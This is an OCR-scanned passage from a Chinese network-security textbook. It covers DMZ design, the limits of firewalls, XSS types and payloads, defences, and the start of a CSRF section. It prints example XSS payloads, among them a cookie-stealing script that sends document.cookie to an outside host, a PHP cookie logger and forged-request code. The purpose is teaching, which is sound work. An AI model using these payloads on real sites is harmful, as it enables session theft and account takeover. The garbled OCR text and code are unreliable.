统 之 间 的 缓冲 区 。 该 缓冲 区 位 于 企业 内 部 网 络 和 外 部 网 络 之 间 的 小 网 络 区 域内 。 在 这 
个 小 网 络 区 域内 可 以 放置 一 些 必须 公开 的 服务 器 设施 ,如 企业 Web 服务 器 、FTP 服务 器 
和 论坛 等 。 另 一 方面 ,通过 这 样 一 个 DMZ 区 域 ,更 加 有 效 地 保护 了 内 部 网 络 。 因 为 这 种 
网 络 部 署 , 比 起 一 般 的 防火 墙 方案 ,对 来 自 外 网 的 攻击 者 来 说 又 多 了 一 道 关 卡 。 

当然 针对 不 同 的 现实 情况 ,对 区 域 的 划分 也 有 所 不 同 。 例 如 ,有 的 组 织 与 企业 网 络 
只 划分 为 内 部 与 外 部 两 个 安全 区 域 , 外 部 区 域 不 允许 访问 内 部 区 域 , 而 内 部 区 域 访问 外 
部 区 域 受 安全 策略 控制 。 有 的 组 织 与 企业 分 为 内 部 、 外 部 .DMZ 三 个 安全 区 域 , 外 部 区 
域 不 允许 访问 内 部 区 域 和 DMZ 区 域 ,只 有 内 部 特定 用 户 允 许 访问 DMZ 的 应 用 服务 ( 例 
如 ,财务 与 ERP 应用) ,DMZ 只 响应 来 自 内 部 特定 用 户 的 财务 和 ERP 应 用 访问 请 求 。 有 
的 组 织 与 企业 网 络 分 为 内 部 、 外 部 和 DMZ 三 个 安全 区 域 , 内 部 和 外 部 只 允许 访问 DMZ 
区 域 的 WWW 和 E-mail 应 用 ,DMZ 区 域 只 允许 主动 访问 外 部 的 DNS 和 SMTP 应 用 。 
有 的 组 织 与 企业 将 网 络 划 分 为 内 部 、 外 部 .DMZ 和 DMZ2 四 个 安全 区 域 ,内 部 和 DMZ2 
区 域 访问 内 部 受 安全 策略 控制 ,只 有 内 部 和 DMZ2 特定 用 户 访问 DMZ 的 财务 或 ERP 应 
用 ,内 部 区 域 和 DMZ2 区 域 之 间 不 允许 互相 访问 。 上 述 例子 ,只 为 说 明 组 织 与 企业 对 网 
络 的 划分 需要 根据 自身 的 实际 情况 ,可 采取 的 方案 非常 多 且 非 常 灵活 。 
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2) 防火 墙 的 缺陷 

防火 墙 是 网 络 安全 的 基本 防御 措施 之 一 ,应 用 广泛 。 但 是 ,防火 墙 也 存在 一 些 自身 
的 不 足 : 

(1) 有 些 网 络 连接 未 通过 防火 墙 ,防火 墙 则 起 不 到 保护 作用 。 

防火 墙 一 般 处 于 两 个 网 络 的 边界 处 ,负责 检查 所 有 进出 的 流量 数据 。 但 是 ,不 能 防 
止 敌对 分 子 通过 电磁 辐射 等 方式 绕 过 防火 墙 人 侵 我 们 的 指挥 自动 化 网 络 。 

(2) 对 于 有 些 威胁 防火 墙 无 能 为 力 。 

防火 墙 是 通过 制定 安全 策略 来 阻止 人 侵 , 策 略 的 制定 是 建立 在 已 知 的 安全 威胁 上 。 
对 于 未 知 的 威胁 ,防火 墙 所 制定 的 策略 对 其 没有 约束 力 。 

(3) 防火 墙 不 能 防止 病毒 的 传播 。 

防火 墙 一 般 对 通过 的 数据 包 的 包头 信息 , 即 IP 地 址 、 端 口 .服务 类 型 等 进行 检查 ,但 
是 对 于 数据 包 封装 的 具体 内 容 不 检查 ,因此 就 给 病毒 以 可 乘 之 机 ,将 病毒 隐藏 在 数据 中 
进行 传输 。 

(4) 不 能 防止 内 部 用 户 的 入 侵 。 

如 果 是 内 部 人 员 非 法 操作 ,窃取 主机 数据 ,位 于 网 络 边界 的 防火 墙 也 起 不 到 作用 。 

鉴于 以 上 原因 ,为 保证 指挥 自动 化 网 络 安全 ,采用 防火 墙 的 同时 ,还 需要 综合 采用 入 
侵 检测 等 技术 ,实现 彼此 联动 的 效果 。 
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321 跨 站 脚本 攻击 


我 们 在 之 前 的 章节 中 已 经 大 致知 道 了 跨 站 脚本 攻击 ,但 它 是 如 何 实现 的 ,具体 能 做 
什么 ,这 是 我 们 接 下 去 要 探讨 的 。 


1， 跨 站 脚本 攻击 基础 


1) JavaScript 

JavaScript 是 用 于 开发 客户 端 网 页 的 脚本 语言 ,最 常见 的 应 用 是 给 静态 HTML 网 页 
添加 脚本 以 实现 动态 交互 性 。 其 最 初 的 设计 者 是 Netscape 的 Brendan Eich。 它 不 仅 是 
一 种 动态 、 弱 类 型 .基于 原型 的 语言 ,而 且 具 有 面向 对 象 的 功能 。 目 前 多 种 浏览 器 ,如 
Netscape IE 和 Mozilla 等 ,都 包含 了 JavaScript 语言 的 核心 。 

程序 员 通 过 在 HTML 网 页 中 使 用 标签 过 script 之 所 /script 之 引入 一 段 JavaScript 
脚本 ,这 段 脚 本 由 浏览 器 执行 后 ,可 以 在 HTML 网 页 中 生成 动态 的 内 容 。 

例如 ,有 以 下 脚本 : 


<htm> 
<body> 
< script type= "text/javascript"> 
hello= "welcome" 
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document .write ("< h2> 叶 hellor "< /h2> "); 
< /script> 

< /body> 

</htm> 


经 过 在 线 代码 编辑 器 执行 后 的 HTML 网 页 如 图 3. 15 所 示 。 


编 得 您 的 代码 ; 
> 


查看 结 采 : 


Welcome 


3.15 代码 执行 结果 


JavaScript 脚本 在 发 往 浏 览 器 之 前 不 需要 经 过 服务 器 的 编译 而 只 是 由 浏览 器 解释 执 
行 , 这 样 就 减少 了 服务 器 的 负担 。 但 随 着 JavaScript 脚本 的 广泛 使 用 ,其 跨 平 台 的 特点 带 
来 了 一 个 备 受 关注 的 问题 , 即 程序 的 安全 性 问题 。JavaScript 不 仅 可 以 读 取 和 修改 
HTML 网 页 的 内 容 , 还 能 响应 页 面 事件 。 如 果 网 页 的 输入 信息 包含 恶意 的 JavaScript 脚 
本 ,那么 Web 程序 将 极 易 受到 XSS 攻击 。 

2) DOM 

文档 对 象 模型 (Document Object Model, DOM) ,是 W3C 组 织 推荐 的 处 理 可 扩展 标 
志 语 言 的 标准 编程 接口 。 其 可 以 动态 地 访问 和 修改 文档 的 内 容 和 结构 而 独立 于 平台 
语言 。 它 是 表示 和 处 理 HTML 或 XML 文档 的 常用 方法 ,是 HTML 或 XML 的 应 用 编 
程 接口 。DOM 定义 了 HTML 或 XML 文档 的 逻辑 结构 ,并 将 一 个 文档 映射 成 一 棵 相应 
的 DOM 树 ,文档 的 每 个 元 素 或 属性 都 是 DOM 树 的 一 个 节点 。 这 样 ,程序 员 对 文档 元 素 
或 属性 的 操作 可 以 转换 为 对 DOM 树 节点 的 操作 , 即 可 以 遍历 .查找 .删除 和 修改 DOM 
树 的 各 个 结 点 以 遍历 文档 结构 查找 文档 元 素 .删除 以 及 修改 文档 内 容 、 改 变 文档 的 显示 
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方式 等 。 
例如 ,有 如 下 HTML 网 页 ,其 对 应 的 DOM 树 如 图 3. 16 所 示 。 


<htm> 
<head> 
<title> 你 好 < /title> 
< /head> 
<body> 
<hl> 欢 迎 您 !< [> 
<ahre 全 "linklist.htm> 点 击 </a> 


< /oooy> 
< /htm> 
Document 
I 
根 节点 : <html> 
标签 : <head> 村 本 
I 
I I 
和 | 标签 : <hl> 标签 : <a> 
| | 
人 | 文本 :“ 内 容 ” 属性 : <hre 人 > 文本 : “链接 " 


3.16 该 HTML 网 页 对 应 的 DOM 树 


3) 浏览 器 的 工作 原理 
XSS 攻击 与 浏览 器 的 组 成 有 着 一 定 的 关系 。 目 前 的 浏览 器 在 结构 上 存在 着 一 些 差 


异 , 但 基本 的 主要 组 件 如 图 3. 17 所 示 。 
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User Interface 

N 
pe 

Browser engine | 量 

1 加 
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四 3.17 浏览 器 的 主要 组 件 


(1) User Interface .用户 界面 : 浏览 器 用 户 直接 可 以 看 到 的 界面 ,包括 书签 目录 、 地 
址 栏 后 退 /前 进 按钮 等 ,也 就 是 你 所 看 到 的 除了 用 来 显示 你 所 请 求 页 面 的 主 窗口 之 外 的 
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其 他 部 分 。 

(2) Browser engine、 浏 览 器 引擎 : 用 来 查询 及 操作 泻 染 引擎 的 接口 。 

(3) Rendering engine, 演 染 引 擎 : 用 来 显示 请 求 的 内 容 。 例 如 ,如 果 用 户 请 求 内 容 
为 HTML 网 页 ,那么 它 就 负责 解析 网 页 中 的 HTML 文本 及 css 样式 ,然后 显示 解析 后 
的 结果 。 

(4) Networking .网络 连 接 : 主要 完成 网 络 调用 的 工作 。 例 如 ,对 于 http 请 求 而 言 ， 
它 可 以 工作 在 不 同 的 平台 上 ,并且 通 过 与 平台 无 关 的 接口 进行 相关 的 工作 。 

(5) UI Backend、UI 后 端 : 用 来 绘制 类 似 组 合 选择 框 及 对 话 框 等 基本 组 件 , 具 有 不 
特定 于 某 个 平台 的 通用 接口 ,底层 使 用 操作 系统 的 用 户 接口 。 

(6) JavaScript Interpreter JS 解释 器 : 用 来 解释 执行 JS 代码 。 

(7) Data Persistence 数据 存储 : 用 于 保存 类 似 cookie 的 各 种 数据 。 

Web 页 面 的 最 终 显示 是 由 几 个 解析 器 共同 协作 的 结果 。 


2. 跨 站 脚本 攻击 原理 


之 前 我 们 已 经 初步 了 解 跨 站 脚本 攻击 的 类 型 , 那 到 底 XSS 是 什么 呢 ? 我 们 来 看 个 简 
单 的 例子 。 

首先 ,这 里 有 一 段 很 简单 的 HTML 代码 ,包括 一 段 JavaScript 语句 块 ,该 语句 块 调 
用 了 alert() 函 数 , 效 果 为 弹出 一 个 消息 框 , 框 内 显示 “xss”。 我 们 可 以 将 代码 复制 到 记事 
本 中 ,另存 为 . html 文件 ,双击 浏览 器 打开 ,就 可 以 看 到 浏览 器 弹 窗 ,如 图 3. 18 所 示 。 


<htm> 
<body> 
< script type= "text/javascript"> 
alert ("xss") 
< /script> 
< /body> 
< /htm> 


3.18 浏览 器 弹 窗 


这 段 代 码 一 定 程度 上 说 明了 JavaScript 的 作用 。 当 浏览 器 遇 到 < 二 script 二 标签 时 , 它 
会 将 内 容 的 控制 权 转交 给 脚本 引擎 处 理 。JavaScript 强大 的 功能 包括 嵌入 动态 文本 于 
HTML 页 面 、 对 浏览 器 事件 做 出 响应 、 读 写 HTML 元 素 、 在 数据 被 提交 到 服务 器 之 前 验 
证 数据 、 控 制 cookie, 包 括 创建 和 修改 等 。 但 若是 将 非法 的 JavaScript、VBscript 等 脚本 
注入 网 页 上 执行 ,浏览 器 只 负责 解释 和 执行 脚本 语言 ,并 不 会 对 代码 本 身 是 否 对 用 户 有 
害 做 出 基本 的 判断 ,这 就 使 得 这 种 注 和 方式 大 有 可 为 。 
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我 们 再 来 看 接 下 来 的 代码 。 


<htm> 
<head> 
<meta http- equiv= "Content— Type" content= "text/html; charset= utf_ 8" /> 
< /head> 
<body> 
< fom action= " method= "get"> 
< input type= "text" name= "xss input"™> 
< input type= "submit"> 
</form 
<hr> 
< mp 
$xss=$_GET['xss input']; 
echo "你 输入 的 字符 为 <br> ' .$xss; 
> 
< /body> 
< /html> 


我 们 看 到 的 如 图 3. 19 所 示 。 


你 输入 的 字符 为 


3.19 代码 演示 


当 我 们 输入 字符 并 单 击 “提交 ?按钮 后 ,文本 框 获取 了 用 户 输入 的 字符 ,并 存 人 变量 ， 
之 后 字符 会 出 现在 页 面 上 。 页 面 会 完整 地 打印 出 我 们 刚刚 输入 的 字符 。 但 若是 我 们 在 
文本 框 中 输入 的 是 HTML/JavaScript 代码 块 呢 ? 页 面 还 会 按 我 们 输入 的 内 容 原样 输出 
吗 ? 我 们 可 以 尝试 着 输入 我 们 之 前 使 用 的 弹 窗 代码 : 二 script type 一 "text/javascript" 之 
alert("xss") 达 /script 记 。 单 击 “ 提 交 ” 按 钮 后 ,页 面 并 不 会 显示 我 们 输入 的 内 容 , 而 是 与 
图 3. 18 一致 地 制造 了 一 个 弹 窗 。 
针对 这 个 例子 我 们 不 光 可 以 从 输入 框 人 手 , 对 于 链接 同样 可 以 。 当 我 们 对 于 上 面 的 
例子 提交 11111 之 后 ,网 站 地 址 栏 显示 的 是 : http://a. com/? xss_input 二 11111。 我 们 
将 xss_input 的 值 换 成 二 script type 王 "textVjavascript" 二 alert("xss") 一 /script 二 ,构造 链接 
http://a. com/? xss_input= <script type= "text/javascript" >alert("xss")</script>。 效 
果 与 在 文本 框 中 输入 HTMIL/JavaScript 代码 块 是 一 致 的 。 
我 们 在 上 面 的 例子 看 到 的 仅仅 是 弹 窗 ,似乎 没有 什么 危害 ,在 这 我 们 再 举 一 个 例子 。 
假设 有 index. php 的 代码 如 下 : 
< ap 
$name=$_GET['name']; 
echo "Welcame $name< br> ™; 
eco "<a href= "http://a.caw/"> test< /a> ™; 
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这 段 代 码 说 的 是 从 页 面 获 取 参 数 name 的 值 , 跳 转 到 一 条 URL 链接 。 但 当 攻 击 者 修 
改 URL 链接 , 则 有 可 能 造成 危害 。 正 常 的 链接 为 : index. php?name 王 11111, 攻 击 者 可 
将 其 修改 为 : 

index.php? name= 

< script> 

Window.cnload= fmcticn () 
Var link= document.getFlementsBYTagName ("a"); 
link[0] .href= "http://b.om"; 

} 

< /script> 
则 当 用 户 单 击 攻击 者 经 过 修改 的 URL 时 ,页 面 源 码 如 下 : 

Weloame 

< script> 

window.onload= fncticn () 

{ 
var linke= doaument .getFlement'sByTagName ("a") ; 
link[0] .href= "http://b.o/™; 

A 

<br> 

<a href= "http://a.caym> test< /a> 

当 用 户 跟 往 常 一 样 单 击 test 后 ,页 面 并 不 会 同 正常 情况 下 跳 转 至 http://a. com/ ,而 
是 攻击 者 提供 的 http://b. com/ ,这 就 有 可 能 使 用 户 受 到 侵害 。 

上 述说 的 两 个 例子 ,就 是 XSS 的 第 一 种 类 型 一 一 非 持久 性 型 XSS, 也 称 为 反射 型 
XSS。 非 持久 型 XSS 攻击 是 一 次 性 的 , 仅 对 当 次 的 页 面 访问 产生 影响 。 非 持久 型 XSS 攻 
击 要 求 用 户 访 问 一 个 被 攻击 者 算 改 后 的 链接 ,用 户 访 问 该 链接 时 ,被 植 人 的 攻击 脚本 被 
用 户 浏览 器 执行 ,从 而 达到 攻击 目的 。 因 此 非 持 久 性 型 XSS 的 攻击 者 往往 要 骗取 用 户 单 
击 恶 意 链 接 , 可 能 是 很 诱惑 人 的 广告 ,也 有 可 能 是 一 封 邮件 。 

第 二 种 类 型 的 XSS 为 存储 型 XSS, 它 也 被 称 为 持久 型 XSS。 在 此 类 漏洞 的 攻击 中 ， 
攻击 者 可 以 将 恶意 代码 永久 的 存储 在 含有 此 类 漏洞 的 网 站 中 ,具有 很 强 的 稳定 性 。 这 些 
漏洞 主要 出 现在 网 站 服务 器 对 客户 信息 进行 收集 并 以 数据 库 或 其 他 方式 进行 存储 的 过 
程 中 。 恶 意 用 户 将 脚本 代码 进行 提交 ,而 服务 器 在 未 经 检查 验证 的 情况 下 就 将 此 类 信息 
存储 , 当 服务 器 程序 使 用 此 类 信息 并 嵌入 到 页 面 中 时 , 则 会 出 现存 储 型 XSS 的 漏洞 。 一 
种 典型 的 情况 就 是 网 站 或 论坛 里 面 的 短 消息 功能 ,如 果 用 户 将 恶意 的 代码 作为 消息 内 容 
发 给 网 站 的 管理 者 。 当 管理 者 读 到 此 类 信息 时 , 则 管理 者 的 私有 信息 和 cookie 会 被 恶意 
攻击 者 获取 。 和 较为 常见 的 一 个 场景 就 是 ,黑客 在 博客 网 站 发 布 一 篇 带 有 恶意 JavaScript 
代码 的 文章 ,而 服务 器 未 对 其 进行 处 理 , 使 得 这 篇 文章 存储 于 服务 器 上 ,恶意 脚本 被 存储 
在 了 服务 器 端 。 这 就 导致 了 所 有 访问 这 篇 文章 的 用 户 , 他 们 的 浏览 器 都 会 执行 这 段 恶意 
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代码 ,所 以 这 种 攻击 就 叫 存储 型 XSS。 从 效果 上 说 ,这 种 类 型 的 XSS 影响 范围 广 , 存 在 时 
间 长 。 

第 三 种 类 型 为 DOM 型 XSS。 事 实 上 DOM 型 XSS 也 是 非 持久 型 XSS, 只 是 其 通过 
修改 页 面 的 DOM 节点 形成 的 XSS ,发 现 它 的 安全 专家 又 专门 提出 了 此 类 XSS ,因此 将 它 
单独 列 为 一 类 。 

DOM 型 XSS 攻击 源 于 DOM 相关 的 对 象 方法 及 属性 被 插入 用 于 XSS 攻击 的 脚本 。 
一 个 典型 的 例子 ,一 个 欢迎 页 面 的 HTML 源码 如 下 : 


<html> 
<head> 
<title> 欢 迎 界 面 < /title> 
< /head> 
<body> 欢 迎 用 户 : 
< SCRIPT> 
Var pos=document.URL.indexOf (name= ")+ 5; 
oament .write (document .URL. substring (pos, document .URL. length) ); 
< /SCRIPT> 的 光临 。 
< /body> 
< /htm> 


对 于 正常 的 HTTP 请 求 : 
file:///C:/Users/pdministrator/Desktop/ 新 建文 本 文档 $20(3) -html?name= 11111 
欢迎 页 面 会 打印 出 登录 用 户 名 11111 的 名 字 , 如 图 3. 20 所 示 。 


蝇 欢迎 内面 


€ 今日 A@ | fei/cyuservadminitatoyDesaop/WjEwZHe20G)htimizmame=1Tn11 


欢迎 用 户 : 11111 的 光临 ， 


3.20 正常 显示 


如 果 这 个 脚本 用 于 下 述 请求 : 


#@: 网 络 安全 横 切 面 


file:/Wc:/Users/aaministrator/Desktop/ 新 建文 本 文档 820 (3) .html?name= < script> alert ("xss")</ 
Script> 


就 导致 DOM 型 XSS 攻击 的 发 生 , 如 图 3. 21 所 示 。 


3.21 DOM 型 XSS 攻击 


用 户 单 击 这 个 链接 ,服务 器 返回 包含 上 面 脚 本 的 HTML 静态 文本 ,用 户 浏览 器 然后 
把 HTML 文本 解析 成 DOM,DOM 中 有 一 个 document 对 象 ,这 个 对 象 中 的 URL 属性 
的 值 就 是 当前 页 面 的 URL。 在 脚本 被 解析 的 时 候 , 这 个 URL 属性 的 值 中 的 一 部 分 被 写 
入 HTML 文本 中 ,而 写 人 的 这 部 分 HTML 文本 刚好 是 JavaScript 脚本 ,这 使 得 二 script 
二 alert ("xss") 一 /script 过 成 为 页 面 最 终 显 示 的 HTML 文本 ,从 而 导致 DOM 型 XSS 攻 
击发 生 。 

上 述 例子 用 到 了 document 对 象 的 write 方法 和 URL 属性 ,实际 上 ,任何 可 以 动态 更 
新 页 面 的 DOM 对 象 方法 及 属性 都 可 能 导致 DOM 型 XSS 攻击 ,下 面 给 出 了 这 些 DOM 
对 象 方法 及 属性 [ 2 5 ] ,我 们 称 之 为 DOM 型 XSS 相关 的 对 象 方法 及 属性 。 

1) 与 DOM 型 XSS 有 关 的 DOM 对 象 属性 


*。 document . URL 


*。 document. URLUnencoded 

。 document . location 

。 document . referrer 

。 window. location 

2) 与 DOM 型 XSS 有 关 的 DOM 的 方法 
(1) 写 人 原始 HTM LL, 例 如 ， 

。 document. write(...) 


。 document. writeln (...) 
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*。 document. body. innerHtml=... 
(2) 直接 修改 DOM, 例 如 ， 

。 document. forms[0]. action=... 
。 document. attachEvent(... ) 

。 document. create... (...) 

*。 document. execCommand(...) 

。 document. body.... 

。 window. attachEvent (...) 

(3) 替换 文档 URL, 例 如 ， 

。 document. location 一 .. . 

。 document. location. hostname =... 
。 document. location. replace(...) 
。 document. location. assign(...) 
。 document. URL=... 

*。 window. navigate (...) 

(4) 打开 或 修改 一 个 窗口 ,例如 ， 

*。 document. open(...) 

。 window. open(...) 

。 window. location. href=... 

(5) 直接 执行 脚本 ,例如 ， 

。 eval(...) 

。 window. execScript(...) 

。 window. setInterval(...) 


。 window. setTimeout(...) 
3. 更 为 强大 的 跨 站 脚本 攻击 有 效 载荷 (XSS Payload) 


我 们 之 前 已 经 了 解 了 XSS 基本 的 攻击 原理 ,实际 上 XSS 可 以 做 得 更 多 。XSS 
Payload, 是 指 那些 用 于 完成 各 种 具体 功能 的 恶意 脚本 。 

实现 XSS 攻击 可 以 通过 JavaScript、ActiveX 控件 、Flash 插件 .Java 插件 等 技术 手段 
实现 ,XSS Payload 实际 上 就 是 上 述 语言 或 控件 的 脚本 ,因此 这 些 语言 或 控件 能 实现 的 功 
能 XSS Payload 大 部 分 都 可 以 做 到 。 

通过 JavaScript 实现 的 XSS Payload ,一 般 有 以 下 几 种 : 

1) cookie 劫持 

由 于 cookie 中 ,往往 会 存储 着 一 些 用 户 安全 级 别 较 高 的 信息 ,如 ,用 户 的 登录 凭证 。 
当 用 户 所 访问 的 网 站 被 注入 恶意 代码 , 它 只 需 通过 document.cookie 这 句 简 单 的 
JavaScript 代码 ,就 可 以 顺利 获取 到 用 户 当前 访问 网 站 的 cookie。 如 果 攻 击 者 能 获取 到 
用 户 登 录 赁 证 的 cookie, 甚 至 可 以 绕 开 登 录 流 程 ,直接 设 置 这 个 cookie 的 值 ,来 访问 用 户 
的 账号 。 
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盗 取 cookie, 发 起 cookie 支持 ,可 以 使 用 XSS 漏洞 插入 cookiejs。cookiejs 关键 代码 : 


Var img= dpcument.createFlement ("img"); 
jmg.src= "http:// a.om/ /cookie.php? cookier= "+ escape (Gooment .cookie); 
document.body.appendchild (img) ; 


其 中 ,cookie. php 关键 代码 : 


< 3p 
$file= fopen ("cookie.txt", "a"); 
fwrite($file,$ GET['cookie']); 
fclose ($file); 

> 


2) 构造 请 求 

JavaScript 可 以 通过 多 种 方式 向 服务 器 发 送 GET 与 POST 请 求 。 网 站 的 数据 访问 和 操 
作 , 基 本 上 都 是 通过 向 服务 器 发 送 请 求 而 实现 的 。 如 果 让 恶意 代码 顺利 模拟 用 户 操 作 , 向 
服务 器 发 送 有 效 请 求 , 将 对 用 户 造 成 重大 损失 。 例 如 ,更 改 用 户 资料 ,删除 用 户 信息 等 。 

构造 GET 和 POST 请 求 ,get. js 关键 代码 : 


Var jnmgF dpcument.createPlement ("img"); 

inmg.src= "一 个 可 以 使 用 的 gt 请 求 链接 " /例如 http://a.cawentry.do?t=gelgid 
/1 

document .body .appendchi ld (img) ; 


Post. js 关键 代码 : 
例 1: 


Var 个 dbcument.createPlement ("fomm"); 
f.actionr= ™; 

£.method= "post"; 
document.body.appendchilq (f£); 

var il= document.createFlement ("input"); 
il.name= "11"; 

il.value= "1111"; 

£.appendChild (i1); 

Var i2= document.createFElement ("input") ; 
i2.name= "22"; 

i2.value= "22222"7 

£.appendhild (i2); 

f.submit(); 


例 2: 


Var dF document.createFlement ("div") 7 

document.bodqy.appenqchilq(Go) ; 

Gd.inmnerHIM= '< fom action= "" method= "post" id= "xssformm" name= "nbfom"> '+ 

‘< input type= hidden" value= "om" name= "Wwe" /> '+ '< imput type= "text" value= 
"aaaa" nane= "aaa" /> + '< /fom> '; 

Gocument .getElementById ("xssfomm") .submit (); 
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例 3: 


var Url= "http://a.com"7 
Var postStr= "aasr= aaaa&xcoe- Wo"; 
Var ajas= null; 
if (windows .XMLHtLtpRequest) 
{ 
ajax— new XMLHEHRecquest () ; 
} 
else if (window.Activexobject) 
{ 
ajax= new Activexobject ("Microsoft .XMLHTTP") ; //ie6 和 一 下 老 版 本 


retum; 
} 
ajax.open ("FOST", url, true); 
ajax. setRequestHeader ("Content— Type", "application/x- www- fom- urlenooded"); 
ajax.send (postStr); 
//ajax.pen ("GET",url, true); 
//ajax.send (null); 
ajax.onreadystatechange= functicn () 
{ 
if (ajax.readyState= = 48&ajax.status==200) 
{ 
//alert ("Done!™); 
} 
} 


3) XSS 钓鱼 

关于 网 站 钓鱼 ,大 家 应 该 也 不 陌生 ,就 是 伪造 一 个 高 度 相似 的 网 站 ,欺骗 用 户 在 钓鱼 
网 站 上 面 填写 账号 密码 或 者 进行 交易 。 而 XSS 钓鱼 也 是 利用 同样 的 原理 。 注 和 页面 的 
恶意 代码 ,会 弹出 一 个 相似 的 弹 窗 ,提示 用 户 输入 账号 密码 登录 。 当 用 户 输入 后 单 击 “ 发 
送 ” 按 钮 ,这 些 资料 已 经 到 了 攻击 者 的 服务 器 上 了 。 

XSS 能 做 的 还 有 很 多 ,例如 ,查看 浏览 器 历史 记录 、 获 取 用 户 IP、 识 别 用 户 安装 的 软 
件 . 还 有 XSS Worm。XSS Worm, 即 XSS 蠕虫 ,是 一 种 具有 自我 传播 能 力 的 XSS 攻击 ， 
杀伤 力 很 大 。 引 发 XSS 蠕虫 的 条 件 比较 高 ,需要 在 用 户 之 间 发 生 交 互 行为 的 页 面 ,这 样 
才能 形成 有 效 的 传播 。 一般 要 同时 结合 反射 型 XSS 和 存储 型 XSS。 例 如 ,先前 新 浪 微 博 
遭 到 攻击 ,就 是 XSS 蠕虫 。 攻 击 者 要 让 XSS 蠕虫 成 功 被 激活 ,应 该 是 通过 私信 或 者 @ 微 
博 的 方式 ,诱惑 一 些微 博大 号 上 当 。 当 这 些 大 号 中 有 人 单 击 了 攻击 链接 后 ,XSS 蠕虫 就 
被 激活 ,开始 传播 了 。 


4. XSS 的 防御 技巧 


1) HttpOnly 
服务 器 端 在 设置 安全 级 别 高 的 cookie 时 , 带 上 HttpOnly 的 属性 ,就 能 防止 
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JavaScript 获取 ,可 以 避免 用 户 的 机 密 信息 被 攻击 者 盗 取 。PHP 设置 HttpOnly: 


heager ("Set— Cookie:a= 1;", false); 

header ("Set— Cookie:b= 1;httponly", fa1se); 

setoookie ("c", "1", NOLD, NULL, NULL, NOLL, ture); 

2) 过 滤 与 编码 机 制 

过 滤 与 编码 机 制 是 Web 应 用 程序 常 使 用 的 防范 XSS 漏洞 机 制 ,主要 用 于 防范 存储 
型 XSS 漏洞 。 因 为 这 种 漏洞 是 攻击 者 将 恶意 代码 植 人 服务 器 后 ,再 被 Web 应 用 程序 显 
示 而 引发 的 。 如 果 Web 应 用 程序 能 对 进入 Web 程序 之 前 的 恶意 代码 进行 XSS 检查 , 那 
么 就 可 以 从 源头 上 避免 发 生 XSS 攻击 。 

过 滤 是 指 Web 应 用 程序 对 用 户 输入 的 数据 进行 特征 匹配 。 如 果 被 测 数据 存在 匹配 
内 容 , 则 将 数据 删除 或 修改 后 ,再 让 其 进入 Web 程序 。 常 用 的 过 滤 方 法 是 匹配 文档 中 的 
JavaScript 关键 字 ,检查 用 户 输入 的 数据 。 一般 情况 下 ,我 们 认为 任何 用 户 输入 的 数据 ， 
都 是 “不 可 信 ?” 的 。 输 入 检查 ,一般 是 用 于 输入 格式 检查 ,例如 ,邮箱 .电话 号 码 . 用 户 名 
等 ,都 要 按照 规定 的 格式 输入 (电话 号 码 必 须 纯 是 数字 和 规定 长 度 ;用 户 名 除 中 英文 数字 
外 , 仅 允 许 输 入 几 个 安全 的 符号 )。 输 入 过 滤 不 能 完全 交 由 前 端 负 责 , 前 端的 输入 过 滤 只 
是 为 了 避免 普通 用 户 的 错误 输入 ,减轻 服务 器 的 负担 。 因 为 攻击 者 完全 可 以 绕 过 正常 输 
入 流程 ,直接 利用 相关 接口 向 服务 器 发 送 设置 。 所 以 ,前 端 和 后 端 要 做 相同 的 过 滤 检 查 。 
例如 ,用 户 提交 的 信息 包含 JavaScript, 就 会 认为 该 文档 存在 XSS 攻击 。 但 是 ,这 种 方法 
的 局 限 性 在 于 攻击 者 可 以 利用 各 种 手段 绕 过 过 滤 机 制 。 例 如 ,攻击 者 在 关键 字 
JavaScript 中 间 添 加 多 个 空格 符 ( 比 如 Javascript), 在 匹配 时 ,Web 应 用 程序 认为 
JavaScript 与 Javascript 是 不 相同 的 ,因此 不 会 对 其 进行 过 滤 。 而 当 网 页 传送 到 浏 
览 器 时 ,浏览 器 则 认为 这 两 个 字符 串 具 有 相同 的 语义 ,进而 执行 XSS 攻击 。 所 以 ,在 使 
用 过 滤 方 法 时 ,就 要 求 Web 应 用 程序 有 良好 的 XSS 语言 匹配 库 。 但 是 即便 如 此 ,也 会 发 
生 误 报 程序 反应 缓慢 等 负面 影响 。 

编码 机 制 是 在 过 滤 机 制 的 基础 上 提出 的 一 种 方法 ,主要 利用 Web 应 用 程序 自 带 的 
一 些 编码 函数 (例如 ,ASP 中 的 HtmlEncode 函数 ) 和 程序 员 自 编 的 安全 算法 对 用 户 输入 
的 数据 重新 编码 。 即 使 用 户 输入 的 数据 明显 包含 XSS 攻击 脚本 ,Web 应 用 程序 也 能 接 
受 并 在 输出 显示 时 对 其 进行 编码 ,使 得 攻击 脚本 无 法 执行 。 例如 ,利用 Server. 
HtmlEncode() 函数 对 二 script 记 alert('XSS”) 一 /script 二 编码 后 , 即 Server. HtmlEncode 
("过 script 之 alert('XSS) 一 /script 二 ") ,这 个 脚本 语句 就 变 成 了 &lt; script&.gt; alert 
(XSS) ; &lt;/script& gt; ,在 浏览 器 中 也 只 是 正常 显示 这 个 脚本 内 容 , 而 不 会 执行 脚本 。 
常见 的 编码 有 : 

(1) HtmlEncode。 


对 下 列 字符 实现 编码 : 
&—) ganp; 
< 一 一 》alt 
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Mi:s 


' 一 一 》 娃 39; (下 不 支持 gapos;) 
/ 一 一 》 硅 xz2F7 


(2) JavaScriptEncode。 


对 下 列 字 符 加 上 反 和 斜 杠 ; 

记 - 一 = AN 

hy \， 

VV-==} WW 

\n 一 一 》 \\n 

\r 一 一 》 \\r (Wingows 下 的 换行 符 ) 
例如 : 

™W\".replace(\\/g, \\\\™); //retum \\ 


我 们 也 可 以 使 用 JavaScript 模板 引擎 ,例如 ArtTemplate。 
(3) URLEncode, 
使 用 以 下 JS 原生 方法 进行 URI 编码 和 解码 : encodeURI、decodeURI、 


decodeURIComponent、encodeURIComponent。 
322 跨 站 请 求 伪造 


之 前 已 经 简单 地 介绍 过 CSRF 了 ,在 接 下 去 的 内 容 中 会 对 其 原理 进行 更 加 详细 的 
描述 。 
1. CSRF 的 原理 


当 用 户 通过 浏览 器 登录 某 一 个 站 点 时 ,假设 该 站 点 需要 用 户 进行 身份 信息 验证 ,在 
通常 情况 下 , Web 通过 cookie 或 Session 等 方式 记录 下 用 户 的 认证 信息 ,在 cookie 或 
Session 信息 有 效 的 情况 下 , 当 用 户 再 次 请 求 同 一 个 Web 时 ,浏览 器 会 将 认证 信息 加 入 到 
请 求 的 HTTP 头 部 一 并 发 给 服务 器 接受 验证 ,这 就 省 去 了 用 户 重 复 输入 验证 信息 的 过 
